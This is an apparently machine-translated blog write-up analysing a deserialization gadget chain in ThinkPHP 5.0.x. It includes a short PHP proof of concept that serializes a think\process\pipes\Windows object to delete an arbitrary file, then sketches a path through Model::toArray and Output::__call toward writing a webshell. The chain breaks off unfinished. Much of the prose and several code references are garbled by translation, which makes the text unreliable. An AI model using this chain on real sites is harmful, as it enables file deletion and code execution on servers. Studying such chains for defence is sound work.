Foreword
After reading thinkphp5.1.X deserialization using the chain, and for now thinkphp5.0.X deserialization using the chain, then the difficulty is higher than a, 233 this fun, always stay in the comfort zone too much to complain meaning.
0x01
Installation compose a shuttle
composer create-project topthink/think=5.0.14 tp5.0.14
Environment:
PHP + the Apache-7.0.12-NTS
In version 5.1 we pop export chain is __call Request class method can be called directly, but in 5.0
$ Hook [$ Method,] at the wording is not the same, $ this is in the 5.1.x -> $ hook [ $ method], this is for us, controllable, written in 5.0.x is the self :: $ hook [$ method] here is const type, it is not controllable. So we can not use the class as a Rquest exported, it would need to find other methods __call available.
Here we use
thinkphp / library / think / console / Output.php, Output class methods can subsequently be __call springboard.
Optional Output class method __call
POP chain entry point still
think \ process \ pipes: __ destruct Method
By last article had learned to
see unlink have a function, if we can control $ filename, you can reach any file deletion.
exp:
<?php
namespace think\process\pipes;
class Pipes{
}
class Windows extends Pipes
{
private $files = [];
public function __construct()
{
$this->files=['D:\PHPSTUDY2018\PHPTutorial\WWW\tp5\shell.php'];
}
}
echo base64_encode(serialize(new Windows()));
Naturally, we started looking for RCE point of view file_exists this function.
Here you write directly back the process:
__toString -> toJson -> toArrary
Note that the Conversion class does not contain __toString method in 5.0.x,
where we choose to think \ Model class is triggered. Since the class is an abstract class, so we have to follow to use its subclass in construction EXP when, for example: think \ Model \ Pivot class
In the toArray method we can use to find a similar $ a-> function ($ b) method, and $ a, $ b must be controlled, it allows us to execute __call.
As before, analyze the specific implementation code toArray class
Method toArray Model abstract class, there are three places to perform __call.
Here _call methods we use have been identified,
of Think \ Console \ the Output: __ Call () method
we need to be triggered by a third __call () method
$item[$key] = $value ? $value->getAttr($attr) : null;
Here requires $ value and $ attr are controlled
in order to follow up to see.
Headache, briefly along his thoughts retrial tomorrow
first we back $ value and $ attr are controlled
to perform $ value-> getAttr ($ attr)
and then we go to the Output class selected by backtracking
found
code execution to $ item [$ key] = $ value $ value-> getAttr ($ attr):? null; it is capable of performing Output class __call magic methods
to write shell by _call method method